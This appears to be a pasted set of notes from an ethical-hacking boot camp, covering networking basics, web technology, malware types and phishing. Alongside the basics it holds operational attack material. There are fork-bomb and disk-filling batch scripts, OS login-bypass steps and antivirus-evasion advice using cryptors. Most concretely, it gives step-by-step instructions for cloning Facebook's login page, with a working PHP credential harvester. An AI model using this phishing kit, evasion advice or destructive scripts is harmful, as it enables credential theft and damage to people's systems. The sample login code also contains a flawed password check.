Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Boot Camp Day 1
- ===============
- Session 1
- =========
- Introduction to Information Security
- ------------------------------------
- Information
- -----------
- Collection of data is known as Information. Information makes a complete meaning.
- Data
- ----
- It is raw facts and figures. Data can be anything.
- Text
- Number
- Image
- Audio
- Video
- Data itself, a single piece of data never makes a sense.
- Security
- --------
- To protect and secure from leakage and breaches.
- Information
- ===========
- Personal Information
- Sensitive Information
- Financial Information
- Economical Information
- Banking Information
- Hackers
- =======
- The person who have the highest amount of knowledge in the field of computer and technology.
- How a system is working.
- How processes are working.
- How my new technologies are working.
- Client side and server side process.
- Hacking
- =======
- Gaining someine's data with or without their authorisation. Legally or illegally.
- Types of Hackers
- ================
- 1. White Hat Hacker
- They are good people, who work for the welfare of the organisation. They work for the security only.
- Rahul Tyagi
- Abhijeet Singh
- Sanjeev Multani
- 2. Black Hat Hacker
- They are really bad people, which brings chaos and destruction to the cyber society. They have only one thing in mind.... Money.
- Mitinik
- New Lizard Suqad
- 3. Grey Hat Hacker
- They are the combination of both. They hack into the stuff and uncurtain the dirty things. They have only one focus ---> Welfare of the society and the people.
- Anonymous
- The Legions
- Hacktivism
- Julian Assange --> The Wikileaks
- Edward Snoden
- Script Kidies
- -------------
- Copy + Paste --> Who just uses the codes and techniques that are created by others without knowning how things are working.
- N00bz
- -----
- They are new babies who are trying to learn something new in the world of cyber.
- Crackers
- --------
- They are not the hackers but they are very very good at cracking the passwords. File passwords, Folder password, OS password, Email password.
- Why Do People Hack?
- -------------------
- Security
- Money
- Revenge
- Curiosity|knowledge
- Fame
- Zoo Zoo Hacker
- Rafi Hacker
- Cyber Crimes And Laws
- =====================
- IT Act 2000 and IT Act 2008
- 28 Types of cyber crime, but all of them are categorised into these few group:
- --> Hacking
- --> Identity Theft
- --> Insult, Online Defamation
- --> Harrasament
- --> Cyber Terrorism
- Section 43:
- Penalty and compensation for damage to computer and computer system
- Section 65:
- Tampering with Computer Source Documents
- Section 66:
- Computer Related Offences
- Section 67:
- Punishment for publishing or transmitting obsence material in electronic form
- Section 71:
- Penalty For Misrepresentation
- Section 72:
- Breach of confidentiality and privacy
- Section 73:
- Penalty for publishing electronic signature certificate false in certain particular | Signature Forgery
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 2
- =========
- Network Terminology I
- ---------------------
- Network
- =======
- Connection of two or more IT Electronic Devices, with a sole purpose of Information Interchange.
- Topology
- ========
- How my devices are connected to each other in the network. Physical layout of the network.
- 1. Star Topology
- ================
- When all of my end devices are connected to a central connecting device.
- If my central device is down, then communication is not possible.
- 2. Ring Topology
- ================
- When all of my end devices are connected in a closed circular chain.
- There are two ways of communication in Ring Topology
- 1. Unidirectional
- Either clock or anti clock
- 2. Bidirectional
- Data can go through any direction
- 3. Mesh Topology
- ================
- When all of my devices are connected to every device in the network.
- 4. Bus Topology
- ===============
- When all the end devices are connected to a central communicating line, which is known as Back Bone.
- 5. Hybrid Topology
- ==================
- When two or more type of topologies are connected in the network.
- Protocols
- =========
- Set of rules and regulations, which are required by every device to follow, to commnunicate in the network.
- 1. IP --> Internet Protocol
- 2. TCP --> Transmission Control Protocol
- 3. UDP --> User Datagram Protocol
- 4. FTP --> File Transfer Protocol
- 5. HTTP --> Hyper Text Transfer Protocol
- 6. SMTP --> Simple Mail Transfer Protocol
- 7. VoIP --> Voice Over Internet Protocol
- 8. DHCP --> Dynamic Host Configuration Protocol
- IP Address
- ==========
- Internet Protocol Address
- -------------------------
- It is a virtual address which is provided to a device, which is connected to a network or internet, just for communicating. It is unique in a network.
- Version of IP Address
- =====================
- 1. IPv4
- 2. IPv6
- 1. IPv4 --> Internet Protocol Version 4
- ----------------------------------------
- It is a 32 bit long address, divided into 4 octets and seperated by a period.
- 192.168.0.28 ---> IPv4
- 4 octets --> 192|168|0|28
- Because I can represent a number using 8 bits(0 and 1)
- Periods --> dot(.)
- 192 = 128+64 = 11000000
- 168 = 128+32+8 = 10101000
- 0 = 00000000
- 28 = 16 + 8 + 4 = 00011100
- 128 64 32 16 8 4 2 1
- =========================================================
- 1 1 0 0 0 0 0 0 192
- 1 0 1 0 1 0 0 0 168
- 0 0 0 0 0 0 0 0 0
- 0 0 0 1 1 1 0 0 28
- 192.168.0.28 = 11000000.10101000.00000000.00011100
- It is composed of decimal numbers only. --> 0-9
- Total Number Of IP Address --> 2^32 IP Addresses
- 0.0.0.0 - 255.255.255.255
- Classes of IPv4 Addresses
- =========================
- 1. Class A --> 0.0.0.0 - 127.255.255.255
- 2. Class B --> 128.0.0.0 - 191.255.255.255
- 3. Class C --> 192.0.0.0 - 223.255.255.255
- 4. Class D --> 224.0.0.0 - 239.255.255.255
- 5. Class E --> 240.0.0.0 - 255.255.255.255
- Class D and Class E --> Military and research and development purpose.
- 2. IPv6 -> Internet Protocol Version 6
- ======================================
- It is 128 bit long address. It is composed of hexa decimal values. Last 32 bit of IPv6 addresses are taken from MAC Address.
- 0000:0000:0000:0000:0000:0000:0000:0000
- FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
- Total number of IPv6 --> 2^128
- 0000:fe80:0000:f68c:50ff:fe5f:9718
- 5f:97:18
- f4:8c:50:5f:97:18
- Types of IP Address
- ===================
- 1. Public IP Address | Global IP Address
- IP Address which is provided by the ISP or that of ISP
- Google.com --> myipaddress --> 125.63.71.34
- ipcow.com ----> 125.63.71.34
- ipchicken.com > 125.63.71.34
- User-Agent Information
- ======================
- Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
- Hostname = 125.63.71.34.reverse.spectranet.in
- Device = X11
- Operating System = Ubuntu
- Browser Name = Firefox
- Browser Version = 60.0
- Is Mobile Device = False
- Is Beta = False
- Screen Resolution = 1366 x 768
- 2. Private IP Address | Local IP Address
- This is the IP Address which is provided to end devices which are connected in the network, by the router.
- MS-OS --> cmd ---> ipconfig
- Linux/Unix --> Terminal --> ifconfig
- ifconfig --> interface Configuration
- IP Subnetting
- =============
- Division of IP Address into further sub network so that IP wastage is reduced.
- NAT --> Network Address Translation
- ===================================
- It is a service used just above the router so that my Private IP Address can be converted and mapped into Public IP Address and Public IP Address into Private IP Address.
- https://drive.google.com/file/d/0B2xwT_-2wGTkSElEbjVxVzZXUlE1M2FXbjRHcGl1QkRqYlBR/view?usp=sharing
- DHCP
- ====
- Dynamic Host Configuration Protocol
- -----------------------------------
- It is the protocol which works in the router. It is responsible for allocating an IP Address to the connected device in the network.
- IP-Pool
- =======
- It is collection of IP Address which can be provided to the devices.
- DHCP Server
- ===========
- It is the server which provides IP Address to the devices from the IP Pool.
- DHCP allocates the IP Address on the basis of lease time period.
- MS-OS
- =====
- cmd ---> ipconfig /release
- ipconfig /renew
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 3
- =========
- Network Terminology II
- ======================
- Types Of Network
- ----------------
- 1. PAN --> Personal Area Network --> Bluetooth, ShareIt --> 1-10m
- 2. LAN --> Local Area Network --> WiFi, whole Campus --> 10m-5Km
- 3. MAN --> MetroP. Area Network --> Whole City --> 5km-50km
- 4. WAN --> Wide Area Network --> Internet -->
- LAN --> Collection of PAN
- MAN --> Collection of LAN
- WAN --> Collection Of MAN
- 1. Intranet --> Intra -> Inside | Net -> Network
- Network Infrastructure which works inside a campus, cannot be accessed by people outside the campus
- 2. Internet --> Connection of two or more networks
- Ports
- =====
- Are specific gateways vai which a device can use or access the external service. There are two different types of ports:
- 1. Physical Ports
- 2. Virtual Ports
- 1. Physical Ports
- =================
- These are the ports which we can see, touch and can take the services. Which are present in the device and are used for connecting some different hardwares.
- USB
- Audio Jack
- HDMI
- VGA
- Charging Port
- 2. Virtual Ports
- ================
- These are the ports via which i can use the network services. They are not tangible, but can use the services. External and specific services.
- There are 65,555+ virtual ports.
- They are also of three types:
- 1. Well-Known | Pre-Defined Ports
- 2. Registered Ports
- 3. Dynamic Ports
- 1. Well-Known | Pre-Defined Ports
- =================================
- These are the ports which are defined by internet community for running and hosting some specific services. The services over these ports cannot be changed.
- 21 --> FTP
- 22 --> SSH
- 23 --> Telnet
- 80 --> HTTP
- 443 --> HTTPS
- These services can also run on other ports, but on these ports only these service will run.
- Ports under 1-1024 are categorised under this kind of port.
- 2. Registered Ports
- ===================
- These are the ports which are registered by certain organisations for running their specific services.
- Orcale ----> Database ---> MySQL --> 3306
- Apple -----> iPhone -----> iTunes -> 3689
- Black Berry Enterprise ---> server > 3101
- 3. Dynamic Ports
- ================
- These are the ports which are neither Pre-Defined nor registered ports, and can be used by any computer user locally for their own purpose.
- 1337 --> LEET port | Hacker's Port
- Our computer is a dumb device. We humans can remember the names very easily but computer can only understand a language, that is of numbers. So for computers it is easy to remember the number as compared to the name.
- DNS
- ===
- Domain Name System|service
- ==========================
- This service is used to map IP address to domain name and helps in fetching the response of the specified request.
- www.google.com ----> Open front end of google
- 172.217.161.4 -----> Open front end of google
- www.google.co.in --> 172.217.24.227
- www.google.co.in
- in --> indian domain
- co --> company domain inside india
- google ----> domain whose name is google
- root ---> www|mail|drive|calander
- Proxy
- =====
- These are the dummy servers, which are used for hiding and masking my IP Address. Public IP Address.
- kproxy.com
- ipcow.com ---> 125.63.71.34 ---> Original IP Address (Public)
- kproxy.com --> ipcow.com ---> 192.95.12.100 -> Proxy wala IP Address
- VPN --> Virtual Private Network
- ===============================
- They just work like proxy servers but they are much more advance then the proxy servers in the following ways:
- 1. They are used to maintain the anonymity, hiding and masking IP Address
- 2. They provide the encryption of data.
- 3. They provide the tunneling.
- Secret Passage
- Connecting to the internal network of an organisation
- Services
- ========
- 1. Online Based Service ----> kproxy.com
- 2. Extension Based Service -> anonymox
- 3. Standalone Service ------> Proper softwares or hardwares which provide us these services.
- psiphon3
- UltraSurf
- Proxpn
- HotSpot Shield
- openVPN
- OSI Model
- =========
- Open System Interconnection Model
- ---------------------------------
- It is a model which was used for communication in the network. But due to some obvious reasons, this model was made an ideal model. This model is not used at all.
- OSI is 7 layer approach model
- 1. Physical Layer
- Responsible for physical connection and conversion of data into 0s and 1s.
- 2. Data Link Layer
- Responsible for node to node delivery. It is also responsible for physical addressing (MAC address)
- 3. Network Layer
- It provides the packet, IP Address - Source and destination IP Address.
- It also decides the route.
- 4. Transport Layer
- It is responsible for the delivery of the message.
- 5. Session Layer
- It is responsible for the connection establishment, connection authentication and connection termination.
- 6. Presentation Layer
- It is responsible for data compression, encryption and decryption of data.
- 7. Application Layer
- It tells that which application to use for a specific data.
- TCP\IP Model
- ============
- It is 4 layer based model. Which is similar to OSI model. Layers are again independent of each other but it's working is very very fast as compare to that of OSI model.
- Web Technology Basics
- =====================
- 1. Domain Name
- 2. Hosting Space
- 3. Server
- 4. DataBase
- 5. Technology
- Client Side
- Server Side
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 4
- =========
- Information Gathering and Digital Footprinting
- ==============================================
- Phases of hacking
- -----------------
- These phases are must to follow in order to perform any kind of hacking.
- 1. Information Gathering
- 2. Scanning
- 3. Gaining Access
- 4. Maintaining Access
- 5. Covering Traces
- Information Gathering
- ---------------------
- To collect as much Information as possible about the target.
- Information Gathering
- ---------------------
- |
- -------------------------
- | |
- Target specific Network Specific
- | |
- ----------------- -----------------
- | | | |
- Web Site Human as Basic Info. Advance Info.
- as Target target Gathering Gathering
- Information Gathering is divided into further
- 1. Network Specific
- 2. Target Specific
- 1. Network Specific
- ===================
- To collect the information about the network
- Number Of people Connected
- IP Address allocated to the connected devices
- MAC Address
- Name Of the Vendor
- If possible --> Access of the shared folder
- 1. Advanced IP Scanner
- 2. Angry IP Scanner
- 3. Soft Perfect Network Scanner
- https://www.softperfect.com/products/networkscanner/
- NMAP --> Network Mapping tool
- 2. Target Specific
- ==================
- i. Web site or web application
- ii. Human Specific
- Web site or web Application
- ===========================
- IP Address
- Ping
- > 65.52.169.46
- Server Information
- Dedicated or shared
- https://www.yougetsignal.com
- Database Information
- MX and NX Records
- Name of the registrar
- Technologies
- White list and Black List
- |--> robots.txt
- https://whois.net/
- https://www.yougetsignal.com
- https://whois.icann.org/en
- https://mxtoolbox.com/
- wapalyzer --> extension --> helps me in gathering information about the technologies used behind a web site or web application.
- Online Nmap
- https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
- Human Specific
- ==============
- Social Network
- Social Networking Websites
- Linkedin
- Twitter
- Facebook
- Dating Websites
- Matrimonial Websites
- Job Portals
- Fake Surveys
- Spy Services
- ravisraaman.marines
- Tools
- =====
- Maltego
- It is corporate level information gathering tool. It helps in gathering information about each and every aspect.
- Community Edition ---> Free
- All transformations does not work in free edition.
- https://www.paterva.com/web7/downloads.php
- OS Login Bypass
- ===============
- When you log into the OS, then while starting the windows, you will be asked for password.
- 1. Online Method
- 2. Offline Method
- 1. Online Method
- ================
- When you need to crack or bypass the password, change the OS login password when the system is up, and you do not know the current password. It only works in windows ultimate or professional version.
- 1. Right click on "My Computers"
- 2. Click on "Manage"
- 3. Click on "Local Users and Groups", in the left pane
- 4. Click on "Users"
- 5. Choose the user, for whom you want to change the password.
- 6. Right Click
- 7. Set Password
- 2. Offline Method
- =================
- This is the condition, when the device is in shut down mode and we cannot open the group editing policies.
- SAM --> Security Account Manager
- C:\Windows\System32\Config\SAM
- Hiren Boot CD
- Kon Boot CD
- These are live bootable OS. We use tools like Rufus, to make the media bootable.
- BIOS --> Basic Input Output System
- Live OS ---> It replaces the BIOS of the Computer or the device from the one which is in the bootable media.
- https://ufile.io/9yr2t
- k
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 5
- =========
- Malware Illustration
- --------------------
- Malware --> MAL + WARE
- MAL -> MALicious
- WARE -> softWARE
- Malware are malicious softwares which can cause harm to the system. These can be anything, tools, applications, softwares, file.
- Types Of Malware:
- 1. Virus
- 2. Worms
- 3. Trojan
- 4. Keyloggers
- 5. Spywares
- 6. Ransomware
- 7. Botnet
- 8. Rootkits
- 9. Adwares
- 1. VIRUS
- ========
- Vital Information Resource Under Seize
- Virus can be an application, tool, software, which can harm the system and system files of the device.
- Symptoms of virus
- Slow
- Slow Processing
- Delete
- Attribute change
- Extension Change
- Shortcut keys|Files
- It will remain dormant, until a user executes it. Virus needs human assistance for executing itself.
- Batch File Virus
- ================
- 1. Infinite Folder
- ------------------
- :loop
- mkdir %random%
- goto loop
- 2. Cascading folder and file
- ----------------------------
- :rudra
- mkdir rudr
- echo Hello Boys... Me acha hu...!! >>rudr.txt
- cd rudr
- goto rudra
- 3. Space Eating Virus
- ---------------------
- echo hello>>file.txt
- :loop
- type file.txt>>file.txt
- goto loop
- 4. Process Calling
- ------------------
- :loop
- start cmd.exe /c
- goto loop
- 5. Fork Bombing
- ---------------
- %0|%0
- Polymorphic Virus
- Logic Bomb
- Boot Sector Virus
- Browser Infectious Virus
- https://lucideustech.blogspot.com/2018/04/mac-os-login-screen-bypass-with.html
- aran.kuanr@gmail.com
- aran.k.uanr@gmail.com
- ara.n.k.u.anr@gmail.com
- a.r.a.n.k.u.a.n.r@gmail.com
- 2. Keyloggers
- =============
- These are the applications which are used to grab the key strokes of the devices. It is just like an extra layer, which takes the keys and dump them on the screen.
- 1. Online Based| Remote --> iStealer
- 2. Local Storage
- Family Key Logger
- http://www.spyarsenal.com/download.html
- BPK Keylogger
- Refog Keylogger
- Screenshoter --> when ever you press anything, key or mouse click, then your application will take a screenshot.
- Screen Recorder
- 3. Ransomware
- =============
- It is when your system gets hijack and all the system files get encrypted by the attacker and you need to pay some ransom to the attacker for decrypting the files.
- WannaCry
- Pateya
- Bad Rabbit
- 4. Worms
- ========
- These are the malwares which spread by itself. It nees human assistance just for once. Common feature
- Replication
- Copy Itself
- Speard Through Pen drive or mail
- It is target specific
- Conficker worm --> 1,00,000 Devices
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 6
- =========
- 5. Trojans
- ----------
- These are the malwares which helps an attacker to gain the remote access of the target device. Remote Access ---> Backdooring. I can have the access, can download any file, can upload anyfile. can use anything and can manipulate the data.
- There are two types of trojans:
- 1. Forward Connection
- 2. Reverse Connection
- 1. Forward Connection
- ---------------------
- When the attacker have the target's IP Address, then he can directly attack the system.
- 1. Target keeps on moving --> IP Address of the target will keep on changing
- 2. It will be very very hard for an attacker to get the target's IP Address everytime, when he will change the location.
- 2. Reverse Connection
- ---------------------
- The attacker do always have his own IP Address. then the attacker can craft an application which is embedded with his own IP Address. He will send the application to the target. As soon as the target will execute the application, the attacker will receive a reverse remote connection.
- RAT --> Remote Administrative|Access Tools
- These are third party tools which are used for creating Trojans.
- Dark Comet
- How Does Anti-Malware Works
- ===========================
- All of the Anti-Malware works on the basis of signature. If they have the signature of the trojan in the database, it means, that it is a malware else the file is clean.
- How to evade Anti-Malware?
- ==========================
- If I can change the signature it means I can evade the Anti-Malware. We will change the signature of trojan, so that we can evade Anti-Malware.
- With the help of these tools we can change the signature of the trojan:
- 1. Binders
- 2. Cryptors
- 3. Hex Editors --> Neo Hex Editor
- 4. Obfusscators -> Red Gate Smart Assambely
- Binder and cryptor
- ==================
- Chrome Cryptor
- URGE Cryptor
- Raw --> 57/65
- Raw + Chrome Cryptor --> 35/65
- Raw + Chrome Cryptor + URGE Cryptor --> 29/60
- Raw + Chrome Cryptor + URGE Cryptor + Red Gate Smart Assambely --> 12/65
- Downlaod and install, you will get paytm cash back of 500/-
- Downlaod and install the best antivirus
- Download the facebook hacker --> hack any facebook account by this application
- Download and install ---> will help you in securing your device 100% gauranteed
- Scan the network with angry IP Scanner
- 6. Botnets
- ==========
- BOTNET = BOT + NET
- BOT = roBOT
- NET = NETwork
- It means that you are connected in the network, and are controlling many devices.
- The attacker deployed the trojan in n number of systems and devices and controlling it. That whole network of trojan is known as botnet.
- Ares Botnet
- https://github.com/sweetsoftware/Ares
- 7. Rootkits
- ===========
- Which are or can be planted in the root of the device. Administrator, Kernel.
- These are the malwares which attacks and effects the kernel level and hard to find and hard to remove.
- System Protection From Malwares and Secure System Configuration
- ===============================================================
- Security
- --------
- 1. Firewall Should always be enabled.
- 2. Anti-Virus Should always be installed and updated.
- 3. Windows patches and updates.
- 4. Always use sandbox|Virtualised environment for analysing or running a suspicious application.
- Sandboxie --> Virtual and simulated environment for analysing
- Virtual Box Simulation
- 5. EXE radar
- Configuration
- -------------
- 1. attrib --> for checking the attribute
- 2. services
- 3. Activated services
- 4. Startup Service
- msconfig ---> startup
- 5. netstat
- 6. netstat -b
- -b --> applications which are binded to the port
- 7. netstat -ona
- all | ports | Numeric Form
- 8. Firewall Rule
- https://lucideustech.blogspot.com/2018/02/tracing-and-terminating-reverse.html
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 7
- =========
- Introduction to web Architecture and Components
- -----------------------------------------------
- 1. Domain Name
- ---------------
- godaddy.com
- hostgator.com
- 2. Hosting Space
- ----------------
- 000webhost.com
- 3. Server
- ---------
- They are the applications or hardwares which are used to run other programs. server side programs. php script.
- It manages the request and response.
- When a user enters something in the url bar ---> a request is generated
- At the same time, when user receives the data -> a response is received
- Servers are again of 2 types:
- 1. MS OS Based server
- IIS --> Internet Information Services
- 2. Linux Based Servers
- Apache | Tomcat
- 4. Database
- -----------
- It is known as the backbone. It stores the data of the web site or the web application. It stores the data in a tabular way.
- Database --> Tables --> Columns --> Rows (Data)
- Database is again of two type:
- 1. MS OS --> MSSQL
- 2. Linux --> MySQL
- 5. Web Technologies
- -------------------
- These are the coding languages or scripting languages in which our web site or web application is build.
- They are also divided into 2 types
- 1. Client Side | Front End Scripting Language
- 2. Server Side | Back End Scripting Language
- 1. Client Side Scripting
- These provides the UI to the web site or the web application. It is what a user sees on the web browser.
- These require just a browser to run.
- HTML
- 2. Server Side Scripting
- These are what works on back end. They require a server to run.
- PHP
- MS OS --> ASP.NET
- Linux --> PHP
- MS OS --> IIS + MSSQL + ASP.NET ---> Money
- Linux --> Apache|Tomcat + MySQL + php ---> Money
- Local Hosting Server
- ====================
- By using these third party application for free, you can launch and host the application or the web site on the LAN and can run the testing for the same. There is no money involved, I can test the application for free.
- 1. Windows Based Server --> WAMPP
- W --> Windows
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- 2. Linux Based Server --> LAMPP
- L --> Linux
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- 3. Cross Platform Based Server --> XAMPP
- X --> Cross Platform
- A --> Apache
- M --> MySQL
- P --> Perl
- P --> Php
- After Installing XAMPP
- ======================
- 1. Apache
- 2. MySQL
- we need to start these two services.
- How To Access XAMPP Server
- --------------------------
- There are 3 ways via which we can access the xampp server. Open the browser
- 1. localhost
- 2. 127.0.0.1
- 3. Hosted system's IP Address
- Web Security Misconfigurations
- ------------------------------
- 1. If I do have a good firewall, I am secure.
- 2. If I do have a good IDS and IPS, I am secure.
- 3. If the web site of the web application is using HTTPS, I am secure.
- HTML
- ====
- Hyper Text Markup Language
- --------------------------
- Front end developing language. which requires a browser to run.
- 1. HTML --> Each and everything of the front end is written in this tag.
- <html>
- xxxxxx
- xxxxxx
- xxxxxx
- </html>
- 2. Head --> Contains the meta data
- Links of styles, title, date etc etc
- <head>
- xxxxxx
- xxxxxx
- xxxxxx
- xxxxxx
- </head>
- 3. title --> to provide the title to the tab
- <title>Name_Of_The_Title</title>
- 4. Body --> Which contains the whole of the code of the web site and the web application. I works after the head is closed.
- <body>
- xxxxxx
- xxxxxx
- xxxxxx
- </body>
- 5. Paragraph -->
- <p>.....
- ........
- ........
- ........
- </p>
- 6. Break
- <br> --> It is single tag. It doesnot needed to close
- 7. Heading
- There are 6 types of heading tag
- h1
- h2
- h3
- h4
- h5
- h6
- as the number increases, the font size decreases.
- 8. anchor --> to provide the hyper link to anything
- <a href="#">............</a>
- 9. Image
- <img src=""></img>
- 10. Form
- <form action="Kis page p redirect krna hai after clicking submit button" method="GET|POST">
- </form>
- 11. Input
- <input type="text|number|date|password" id="Unique ID" name="Name Of the Element">
- 12. iframe
- <iframe src="http://www.lucideus.com"></iframe>
- ==========
- pagee.html
- ==========
- <html>
- <head>
- <title>CII</title>
- </head>
- <body>
- <p>
- <h1>Grade 2<br>
- =======</h1>
- <h2>Session 1<br>
- ---------</h2>
- <a href="http://www.lucideus.com"><h3>Introduction To Cryptography</a><br>
- ----------------------------</h3>
- Cryptography --> Conversion of text into another form, which is readable but
- not understandable.
- <br>
- Conversion of plain text into an encrypted text via an algorithm which uses a
- key, after transmission, decryption of the encrypted text into the plain text
- via same algorithm and the key.
- <br>
- Plain Text --> It is a normal Text, which is typed by the user. which is
- readable and understandable to everyone.<br>
- Cipher Text --> Encrypted text, which is the output of the encryption.<br>
- Encryption --> Process of converting plain text into a Cipher text, it is
- readable but not understandable<br>
- Decryption --> Reverse of encryption, conversion of Cipher text into a plain
- text<br>
- Algorithm --> It is the code which is used to encrypt and decrypt the plain
- text into cipher text and cipher text into plain text.<br>
- Key --> it is a special function, encryption and decryption is possible just
- due to this key. <br
- </p>
- <img src="naruto.jpg" height="700"></img>
- <form action="mera.html" method="GET">
- Username :<input type="text" id="uname"><br>
- Password :<input type="password" id="pass"><br>
- <input type="submit" id="but">
- </form>
- </body>
- </html>
- =========
- mera.html
- =========
- <html>
- <head>
- <title>Second Page</title>
- </head>
- <body>
- <p>
- This is my second page</p>
- <iframe
- src="http://www.lucideus.com"></iframe><br>
- <img src="goku.jpg" height="500"></img>
- </body>
- </html>
- PHP Basics
- ==========
- Server Side Scripting Language
- <?php
- xxxx
- xxxx
- xxxx
- xxxx
- ?>
- <?php ---> Start of PHP code
- ?> ---> End of php code
- echo "Hello Guys"
- $var --> var is name of variable
- $hack --> Hack is name of variable
- $ ---> used to declare a variable
- $_POST
- $_GET
- =========
- CALL.html
- =========
- <html>
- <head>
- <title>Calculator</title>
- </head>
- <body>
- <form action="calc.php" method="post" attribute="post">
- First Value : <input type="text" id="first" name="first"><br>
- Second Value : <input type="text" id="second" name="second"><br>
- <input type="radio" name="group1" id="add" value="add" checked="true">ADD<br>
- <input type="radio" name="group1" id="subtract" value="subtract">SUBTRACT<br>
- <button type="submit" id="answer" value="answer">Calculate</button>
- </form>
- </body>
- </html>
- ========
- calc.php
- ========
- <html>
- <head>
- <title>Jawab</title>
- </head>
- <body>
- <p>
- The Answer is:
- <?php
- $first=$_POST['first'];
- $second = $_POST['second'];
- if($_POST['group1'] == 'add')
- {
- $ans=$first+$second;
- echo $ans;
- }
- if($_POST['group1'] == 'subtract')
- {
- $ans=$first-$second;
- echo $ans;
- }
- ?>
- </p>
- </body>
- </html>
- don.html
- =========
- <html>
- <head>
- <title>Me Hu DON</title>
- </head>
- <body>
- <h1>Hackers</h1>
- <h2>Mr. Ravi Raman</h2>
- <p>I am Naval Oficer.<br>
- I am an executive Officer.<br>
- I am 35 years old.<br>
- I am communication specialist.<br>
- </p>
- <a href="https://en.wikipedia.org/wiki/Black_hat">
- <h3>Mr. Madhu</h3>
- </a>
- <h4>Mr. Hothi</h4>
- <img src="spidy.jpg" width="500"></img>
- <h5>Mr. Devdas</h5>
- <iframe src="http://www.lucideus.com"></iframe><br><br><br><br><br><br><br><br>
- <form action="sec.php" method="POST">
- Username :<input type="text" id="user" name="users"><br><br>
- Password :<input type="password" id="pass" name="passes"><br><br>
- <input type="submit" value="Login">
- </form>
- </body>
- </html>
- sec.php
- =======
- <html>
- <head>
- <title>SuperHero</title>
- </head>
- <body>
- <h1>This Is My Fav. SuperHero</h1>
- <img src="shakti.jpg">
- <?php
- $username=$_POST['users'];
- $password=$_POST['passes'];
- if($username == "admin")
- {
- echo "Welcome to password protected area admin";
- if($password="passes")
- {
- echo "Welcome admin";
- }
- else
- {
- echo "Wrong password";
- }
- }
- else
- {
- echo "Wrong username";
- }
- ?>
- </body>
- </html>
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 8
- =========
- Phishing
- --------
- It is a technique in which an attacker creates and develop a fake page or a fake web site, which look completely authentic and genuine. but it is not. He deploys the same and make people to enter their credentials.
- 1. Spear Phishing
- 2. Vector Phishing | Credential Harvestor
- 1. Spear Phishing
- -----------------
- Targeting a single or an individual or the crowd of people having common interest. Target Specific.
- 2. Credential Harvestor
- -----------------------
- It is not target specific. Any kind of person can come and enter their credentials. I just need to collect the credentals of the crowd for my own purpose.
- Create Facebook's Phishing Page
- ===============================
- 1. Open Your Browser
- 2. Goto www.facebook.com
- 3. Right Click on the login page ---> view page source
- 4. Select all ---> copy
- 5. Open notepad and paste the whole code
- 6. Scroll to the very top of the code.
- 7. Ctrl+F ---> action=
- action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
- 8. In the received parameter
- https://www.facebook.com/login.php?login_attempt=1&lwv=110
- Replace it with fish.php
- fish.php
- ========
- <?php
- header ('Location: https://www.facebook.com');
- $handle = fopen("coffee.txt", "a");
- foreach($_POST as $variable => $value) {
- fwrite($handle, $variable);
- fwrite($handle, "=");
- fwrite($handle, $value);
- fwrite($handle, "\r\n");
- }
- fwrite($handle, "\r\n");
- fclose($handle);
- exit;
- ?>
- Understanding The Code
- ======================
- <?php ---> start of the php code
- header ('Location: https://www.facebook.com');
- when the working of the php code is done, then redirect the user to https://www.facebook.com
- $handle = fopen("coffee.txt","a");
- $handle ---> Variable
- fopen --> to open a file
- It will open a file, coffee.txt
- When we open a file, I need to pass an attribute, which says in which mode the file should open. There are 3 major attributes
- 1. Read --> r
- This attribute is used for just reading the content of the file.
- 2. Write -> w
- This attribute is use to write the content in the file.
- 1. If there is no file name which we passed, then it will create a new file with the same name.
- 2. If there is a file with the name and there is data inside the file, it will delete all the data and start writing the new data from the beginning, Overwrite.
- 3. Append-> a
- It is same like write, but it never deletes data but, it will start continue to write the data in the same file.
- foreach($_POST as $variable => $value)
- It is for loop in php. It says jb tk mere pass data POST method se aa rha hai, tb tk ye loop chalta rahe.
- $variable => $value
- Phone or email => abc.cyb@gmail.com
- fwrite($handle, $variable); --> 1
- fwrite($handle, "="); ---> 2
- fwrite($handle, $value); ---> 3
- fwrite($handle, "\r\n"); --->4
- fwrite --> to write data into the file
- fwrite($handle, $variable);
- $handle ---> specify the file in which we want to write
- $variable --> data which is to be stores in the file
- 1 2 3
- email or phone = Store the value inputed by the user
- 4 --->it will enter a new line and start from the begining of the next line
- fclose($handle);
- It means to close the open file ---> coffee.txt
- exit;
- To stop the execution of the code and redirect to the user to the site specified in header
- ?> --> close of php code
- IDN Homographic Attack
- ======================
- There are many languages in the world. Among those language there are many characters which are similar to english characters.
- To human eye, those similar characters do not have anby difference but to computer they do have the difference of their ASCII Value.
- а, с, е, о, р, х and у --> Russian
- a, c, e, o, p, x and y --> English
- deepika Padukone --> English
- dеерikа раdukоnе --> Cyrallic + English
- Case Study - Must Read
- ======================
- https://thehackernews.com/2017/04/unicode-Punycode-phishing-attack.html
- Social Engineering
- ==================
- To bluf someone in order to take the sensitive data. It is hacking without coding, Human mind hacking. An attacker can reterive the data or can make others to do his dirty works.
- Fake Mails
- ==========
- Sending ----> https://emkei.cz/
- https://getgophish.com/
